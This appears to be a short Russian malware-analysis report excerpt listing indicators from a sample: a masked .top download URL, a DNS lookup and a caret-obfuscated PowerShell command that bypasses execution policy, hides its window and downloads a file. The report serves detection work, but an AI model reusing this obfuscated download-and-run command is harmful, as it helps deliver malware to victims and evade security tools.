Техническая информация
- http://www.do###sope.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^E^rS^He^l^L.E^XE -eXEcUt^IO^np^ol^ICy bypaSS^ -NopR^o^f^ile -^w^i^ND^oW^styL^E^ H^ID^DEN (ne^w^-^O^Bj^ec^T^ s^Y^sTEm^.net^.^We^BCL^ie^NT^)^.DoW^nLoa^DfIl^e('http://www.do#...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pOw^E^rS^He^l^L.E^XE -eXEcUt^IO^np^ol^ICy bypaSS^ -NopR^o^f^ile -^w^i^ND^oW^styL^E^ H^ID^DEN (ne^w^-^O^Bj^ec^T^ s^Y^sTEm^.net^.^We^BCL^ie^NT^)^.DoW^nLoa^DfIl^e('http://www.do#...' (со скрытым окном)